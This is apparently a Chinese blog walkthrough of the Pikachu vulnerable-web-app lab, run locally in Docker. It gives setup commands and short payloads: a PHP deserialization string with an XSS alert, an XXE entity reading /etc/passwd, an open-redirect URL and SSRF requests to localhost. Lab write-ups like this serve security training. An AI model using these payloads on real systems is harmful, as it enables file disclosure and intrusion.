pikachu靶场(完结) _pikachu

少年恃险若平地，独倚长剑凌清秋。这篇文章主要讲述pikachu靶场(完结)相关的知识，希望能为你提供帮助。
pikachu靶场环境虚拟机192.168.48.130
docker+centos8
安装这里把启动指令写成脚本文件了，方便启动
启动完成后，访问http://your-ip:port，点击初始化安装后按照提示操作即可

docker search pikachu docker pull area39/pikachu docker images vi pikachu.sh docker run -dt --name pikachu -p 80:80 --rm area39/pikachu chmod +x pikachu.sh ./pikachu docker ps ----------------------------------------------------------------- docker进入镜像 docker ps查看containerid docker exec -it containerid /bin/bash mysql -u root -p数据库密码为空密码

php反序列化直接找个payload来用

O:1:"S":1:{s:4:"test"; s:29:"< script> alert(\'xss\')< /script> "; } //O:1 O代表object，1代表对象名字长度为1个字符 //S:1 S代表对象的名称，1代表对象里有1个变量 //s 数据类型，4 变量名称长度，test 变量名称

文章图片

XXE按照xml文档语法构造payload
读取passwd文件
```html/xml
< ?xml version=" 1.0" ?>
< !DOCTYPE xxe [
< !ENTITY xxe SYSTEM " file:///etc/passwd" >
]>
< test> &xxe; < /test>

![image20210709051549420.png](https://s2.51cto.com/images/20210729/1627559718422563.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)# URL重定向链接后带有url参数，修改url参数为跳转地址即可 ![image20210709052110916.png](https://s2.51cto.com/images/20210729/1627559751704863.png?x-oss-process=image/watermark,size_14,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_100,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=)要加http/https，其他几个链接后面没有url参数的加上就可以了 ```shell http://192.168.48.130/vul/urlredirect/urlredirect.php?url=http://www.baidu.com

文章图片

发送后成功跳转

文章图片

文章图片

服务器端请求伪造服务器端请求伪造(curl)先开这句话，发现没有诗出来，看了下url好像有些问题，多了个/vul，删除后即可

http://192.168.48.130/vul/***f/***f_curl.php?url=http://127.0.0.1/vul/vul/***f/***f_info/info1.php http://192.168.48.130/vul/***f/***f_curl.php?url=http://127.0.0.1/vul/***f/***f_info/info1.php